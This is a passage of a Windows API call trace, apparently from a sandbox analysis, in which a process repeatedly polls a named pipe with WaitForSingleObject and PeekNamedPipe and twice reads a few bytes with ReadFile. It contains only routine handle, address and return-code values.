[0116.197] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0116.228] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0116.228] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0116.259] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0116.259] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0116.290] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0116.290] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0116.322] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0116.322] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0116.353] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0116.353] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0116.384] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0116.384] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0116.415] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0116.415] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0116.447] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0116.447] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0116.477] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0116.477] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0116.508] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0116.509] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0116.540] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0116.540] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0116.571] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0116.571] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0116.602] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0116.602] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0116.634] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0116.634] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0116.665] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0116.665] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0116.696] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0116.696] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0116.727] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0116.727] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0116.758] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0116.758] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0116.789] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0116.789] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0116.820] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0116.820] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0116.851] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0116.852] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0116.883] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0116.883] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0116.914] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0116.915] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0116.945] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0116.945] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0116.979] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0116.980] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0117.007] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0117.008] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0117.315] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0117.315] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0117.379] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0117.380] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0117.429] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0117.429] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0117.470] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0117.471] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0117.494] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0117.494] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0117.533] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0117.533] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0117.613] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0117.613] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0117.637] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0117.640] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0117.819] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0117.819] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0118.012] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0118.013] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0118.060] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0118.063] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0118.088] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0118.088] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0118.116] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0118.116] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0118.533] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0118.539] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0118.620] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0118.620] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0119.078] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0119.078] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0119.098] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0119.098] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0119.129] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0119.130] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0119.304] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0119.328] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0119.397] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0119.424] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0119.466] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0119.466] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0119.528] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0119.528] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0119.945] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0119.945] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0119.971] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0119.972] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0120.030] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0120.030] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0120.076] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0120.076] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0120.108] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0120.108] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0120.283] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0120.284] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0120.349] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0120.349] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0120.378] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0120.378] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0120.426] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0120.426] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0120.455] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0120.455] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0120.486] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x46, lpBytesLeftThisMessage=0x0) returned 1 [0120.486] ReadFile (in: hFile=0x128, lpBuffer=0x71fb18, nNumberOfBytesToRead=0x46, lpNumberOfBytesRead=0x71f89c, lpOverlapped=0x0 | out: lpBuffer=0x71fb18*, lpNumberOfBytesRead=0x71f89c*=0x46, lpOverlapped=0x0) returned 1 [0120.486] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0120.808] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0120.811] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0120.831] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0120.832] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0120.951] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0120.951] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0120.971] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0120.971] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0121.001] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0121.001] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0121.034] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0121.034] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0121.063] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0121.064] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0121.095] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x4e, lpBytesLeftThisMessage=0x0) returned 1 [0121.095] ReadFile (in: hFile=0x128, lpBuffer=0x71fb18, nNumberOfBytesToRead=0x4e, lpNumberOfBytesRead=0x71f89c, lpOverlapped=0x0 | out: lpBuffer=0x71fb18*, lpNumberOfBytesRead=0x71f89c*=0x4e, lpOverlapped=0x0) returned 1 [0121.095] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0121.126] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, 